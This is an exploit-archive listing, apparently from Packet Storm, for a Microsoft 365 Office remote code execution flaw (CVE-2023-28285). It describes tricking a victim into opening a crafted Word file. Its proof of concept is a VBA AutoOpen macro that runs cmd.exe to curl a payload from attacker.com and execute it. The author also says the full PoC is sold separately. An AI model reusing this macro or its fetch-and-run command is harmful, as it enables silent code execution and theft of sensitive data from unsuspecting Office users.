exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution

Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution
Posted Jun 27, 2023
Authored by nu11secur1ty

Microsoft 365 MSO version 2305 build 16.0.16501.20074 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2023-28285
SHA-256 | 3b2deb6294f7b71a818f81eca0bdc3765f7fecf2245a2ab5827f991c129e303f

Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution

Change Mirror Download
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074)
64-bit Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285


## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using a malicious `Word` file for
`Office-365 API`. After the user will open the file to read it, from
the API of Office-365, without being asked what it wants to activate,
etc, he will activate the code of the malicious server, which he will
inject himself, from this malicious server. Emedietly after this
click, the attacker can receive very sensitive information! For bank
accounts, logs from some sniff attacks, tracking of all the traffic of
the victim without stopping, and more malicious stuff, it depends on
the scenario and etc.
STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim
hit the button of the exploit!

[+]PoC:
```cmd
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
vbNormalFocus)
End Sub
```

## FYI:
The PoC has a price and this report will be uploaded with a
description and video of how you can reproduce it only.

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)

## Time spend:
01:30:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close